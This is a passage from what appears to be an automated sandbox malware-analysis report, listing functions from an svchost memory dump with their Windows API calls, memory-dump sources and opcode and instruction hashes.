                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95edc4579f270cfbb72ce7a2e89be70b5a00897b7fb9d6ab8d0e8bae2bfc8fae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB415B326041158ACB30BB2CC8557BB7366EFC532CB49C695F84ACB6A4F721EE45C780
                                                                                                                                                                                                                    Function 02C74070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountTick_snprintf
                                                                                                                                                                                                                    • String ID: %dd %dh %dm
                                                                                                                                                                                                                    • API String ID: 3495410349-3074259717
                                                                                                                                                                                                                    • Opcode ID: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                                    • Instruction ID: 40d2b3104a05a57f35212cc7c0754e7d4fd353f4d78f6662d977a8fa07f0f0fe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0640c349b482966ac159f99e89a9e93f9b7a32822f268aa3d3c49e345b37afc3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F08262B8105457A35C541D6C1AABA594F87C8311B8DC67DFD0ACF3E9DCB49C514290
                                                                                                                                                                                                                    Function 02C7A820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A834
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7A850
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2017088797-3387790918
                                                                                                                                                                                                                    • Opcode ID: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                                    • Instruction ID: 957f9616aee886f5acf473ca777cac56d7ab32bc140f39379ed3d1ad4d576afd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 481158786ac46d56176740526b23a3a8955e17810fc96629d63a91feb70789d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E01275D846489FC706DF58F448B197BA8B758321F008B56F868873A1C774A960CB50
                                                                                                                                                                                                                    Function 02CA6EF0 Relevance: 5.2, APIs: 4, Instructions: 158COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 02CA6F28
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 02CA6FCB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02CA7044
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02CA707D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                    • Opcode ID: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                                    • Instruction ID: fcec472d8811079ba1f776a678c5332af73bd4d2dcd02613962e01a052ad3254
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a99cf2c19caa97d2b88e01849c5dc47cdf9900b7fa518adc4f37197e6ee117c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F516576A00B028FC714CF69C9D566AF7F6FF84308B28492DD98687A10E772F954CB80
                                                                                                                                                                                                                    Function 02C7DA00 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C7DA3F
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C7DA46
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7DA56
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,00000014,?,02C7DE7B,00000000,?,?,00000000,Content-Type,?,?,00000000), ref: 02C7DA61
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 471586229-0
                                                                                                                                                                                                                    • Opcode ID: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                                    • Instruction ID: 5eb95878f65c72346972bc3317d04c08cfa5de28d9cf7efa16dcff17412b4f01
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e92818099e0351410444197cd07c409c11ba63b2a236b4055ff852c97ff7d887
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901F233A852156B86219A69AC44FE7B79CFFC5770F008251FD06DF184D721EA0483E0
                                                                                                                                                                                                                    Function 02C7E290 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C7E94B,?,?,?), ref: 02C7E2A8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7E94B,?,?,?), ref: 02C7E2AF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E2BF
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,?,02C7E94B,?,?,?), ref: 02C7E2CA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 471586229-0
                                                                                                                                                                                                                    • Opcode ID: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                                    • Instruction ID: b62f0556ec8815c3ad3f713ae6f7287db69877e0de0a2f1143eff459f65c52f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8de82c6c68c7a200bdb47a3d304783443ba7fb4700a11398772ab85a75e0eb4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5F05533A0166137C6226A99AC44FCBB75CEFD2760F400260FE00EF280CA20DE0087F1
                                                                                                                                                                                                                    Function 02C7D390 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,7622F380,?,02C7D799,00000000,?,00000000,02C7EAE2), ref: 02C7D3A4
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7D3A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D3B4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7D3B7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                                    • Instruction ID: b848486a1f158c6433e21d6dcf7b06956120b6300da42dc684efe6e88b722ed3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F06D74E40362ABEB105F39AC48B977BECAF48686F940481E90ED3140E775C910AAA0
                                                                                                                                                                                                                    Function 02CB1BF0 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C05
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02CB1C08
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C15
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02CB1C18
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                                    • Instruction ID: 9aba192d21fd338b10a677a2566ba91084e4345642c3fd3c61d2f9676863cdc5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BE08632FC526877C51226A66C0CF877B1CDFC1B72F094411F608D3141C660941096F0